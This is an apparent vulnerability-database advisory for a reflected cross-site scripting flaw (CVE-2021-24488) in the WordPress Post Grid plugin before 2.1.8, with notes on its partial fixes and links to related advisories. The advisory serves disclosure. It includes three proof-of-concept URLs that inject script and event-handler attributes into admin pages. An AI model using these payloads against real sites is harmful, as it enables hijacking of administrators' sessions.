Post Grid < 2.1.8 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24488 | Plugin Vulnerabilities

Description

The slider import search feature and tab parameter of the plugin settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

v 2.1.4 partially fixed the issue, still allowing arbitrary attributes to be injected, ie
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)//

v2.1.5 removed a lot of escaping done in 2.1.4, and was put back in v2.1.8

Affects Plugins

Fixed in 2.1.8

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

0xB9

Submitter twitter

Verified

Yes

WPVDB ID

1fc0aace-ba85-4939-9007-d150960add4a

Timeline

Publicly Published

2021-06-28 (about 2 years ago)

Added

2021-06-28 (about 2 years ago)

Last Updated

2022-01-02 (about 2 years ago)

Other

Published

Title

Published

2022-12-16

Title

Vision Interactive For WordPress < 1.5.4 - Contributor+ Stored XSS

Published

2023-04-25

Title

Shield Security < 17.0.18 - Unauthenticated Stored XSS

Published

2024-02-16

Title

Page scroll to id < 1.7.9 - Contributor+ Stored XSS

Published

2024-04-15

Title

Canva – Design beautiful blog graphics <= 1.2.4 - Reflected Cross-Site Scripting

Published

2021-03-17

Title

Elementor < 3.1.4 - Authenticated Stored Cross-Site Scripting (XSS) in Icon Box Widget